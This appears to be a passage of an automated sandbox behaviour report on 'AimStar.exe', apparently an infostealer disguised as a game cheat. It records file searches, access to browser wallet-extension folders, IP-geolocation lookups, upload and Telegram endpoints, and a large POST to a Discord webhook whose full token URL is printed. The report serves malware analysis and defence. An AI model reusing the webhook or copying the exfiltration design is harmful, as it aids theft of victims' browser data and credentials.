              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF710F618E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,88_2_00007FF7139746EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,88_2_00007FF71396E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B88E0 FindFirstFileExA,88_2_00007FF7139B88E0
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.5:53656 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: skoch-6bauu.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0 HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 726812User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=156af1f13d18752ec77c0725b357aa90
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jan 2025 21:12:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735765958x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhGPHmf2CkQpxNJKrU3FALioK3d3Ezz5k2Wlz3Gfy8iHMBtU9bCd4dyhhw7icRi4woK8y%2F9mPBpUzTjNLSNTRAg9mhGkdZpOuJlrCyBMoMlGIciOTqFl0%2Bu62jFi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=a3e5254bb13bbfd0eab3271a2cd309bfca598747-1735765956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=aOFeXPXGF_hja_MGT_l13.d1SgVHLQwWi5_dvT69AJo-1735765956727-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fb5822a1b5f32d3-EWR
              Source: AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: AimStar.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2405422527.000002020D414000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404247268.000002020D411000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2405752519.000002020D417000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2114827606.000002168FB60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2294279709.000002A6D0038000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2207955452.000001B10EE45000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: AimStar.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: AimStar.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: libcrypto-3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: AimStar.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: AimStar.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2049843028.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.60.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
              Source: SIHClient.exe, 0000003C.00000003.2207955452.000001B10EE45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?05cf9f1
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: AimStar.exe, 00000002.00000002.2409740452.000002020CA48000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056832978.000002020CA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020C958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
              Source: powershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: AimStar.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: AimStar.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: AimStar.exeString found in binary or memory: http://ocsp.sectigo.com0$
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: AimStar.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: AimStar.exeString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: AimStar.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: AimStar.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: AimStar.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: AimStar.exeString found in binary or memory: http://www.heaventools.com
              Source: AimStar.exeString found in binary or memory: http://www.heaventools.comDVarFileInfo$
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: AimStar.exe, 00000002.00000003.2403909784.000002020D300000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: AimStar.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: AimStar.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: AimStar.exeString found in binary or memory: https://d.symcb.com/rpa0.
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNAp
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: AimStar.exe, 00000002.00000002.2409508482.000002020C730000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CC97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dsc.gg/skochworld
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dsc.gg/skochworldi
              Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dsc.gg/skochworldr#
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
